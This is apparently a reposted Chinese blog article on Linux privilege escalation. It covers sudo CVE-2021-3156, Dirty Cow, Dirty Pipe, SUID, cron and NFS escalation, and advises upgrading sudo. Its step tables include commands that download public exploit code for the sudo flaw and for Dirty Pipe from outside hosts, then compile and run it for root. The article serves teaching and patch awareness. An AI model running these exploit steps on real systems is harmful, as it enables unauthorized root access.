一、CVE-2021-3156 Linux提权漏洞
项目 | 详情 |
漏洞简介 | 2021年1月26日,Linux安全工具sudo被发现存在严重的基于堆缓冲区溢出漏洞,利用这一漏洞,攻击者无需知道用户密码,即可获得root权限。 |
危险等级 | 该漏洞的危险等级评分为7分,属于高危漏洞。 |
受影响版本 | Sudo 1.8.2 – 1.8.31p2 Sudo 1.9.0 – 1.9.5p1 |
不受影响版本 | Sudo >= 1.9.5p2。 |
复现步骤 | 1. 查看Linux及sudo版本 2. 简单测试漏洞是否存在 3. 下载并编译exp 4. 添加执行权限 5. 进行提权测试。 |
解决方案 | 官方已在sudo新版本1.9.5p2中修复了该漏洞,建议受影响的用户尽快升级版本进行防护。 |
其他常见Linux提权方式
提权方式 | 详情 |
内核漏洞提权 | 脏牛漏洞(Dirty Cow):低权限用户可以覆盖重写任意只读文件中的数据,从而提升权限至root。 CVE-2024-1086:影响多个版本的Linux内核,允许本地低权限威胁者获取root权限。 |
SUID配置错误提权 | 通过设置SUID权限,普通用户可以在执行过程中暂时获得文件拥有者的权限,从而提权。 |
计划任务提权 | 通过修改具有root权限的计划任务脚本来实现提权。 |
NFS提权 | 如果NFS服务器中存在no_root_squash选项,客户端可以使用root用户对共享目录进行操作,从而实现提权。 |
具体提权案例
CVE-2021-3156漏洞复现
(图片来源网络,侵删)
步骤 | 命令/操作 |
1 | lsb_release -a sudo -V |
2 | sudoedit -s / |
3 | git clone https://github.com/blasty/CVE-2021-3156.git cd CVE-2021-3156 |
4 | make |
5 | chmod a+x sudo-hax-me-a-sandwich |
6 | ./sudo-hax-me-a-sandwich 0 |
Dirty Pipe漏洞复现(CVE-2022-0847)
步骤 | 命令/操作 |
1 | uname -a useradd -m pikaqiu useradd -s /bin/bash pikaqiu2 |
2 | su pikaqiu wget https://haxx.in/files/dirtypipez.c gcc dirtypipez.c -o exp |
3 | sudo find / -perm -u=s -type f 2>/dev/null ./exp /usr/bin/chfn |
是关于Linux提权漏洞的详细归纳,包括具体的漏洞案例和提权方法,建议系统管理员定期检查和更新系统,以确保系统安全。
各位小伙伴们,我刚刚为大家分享了有关linux提权漏洞的知识,希望对你们有所帮助。如果您还有其他相关问题需要解决,欢迎随时提出哦!
(图片来源网络,侵删)
本文来源于互联网,如若侵权,请联系管理员删除,本文链接:https://www.9969.net/67114.html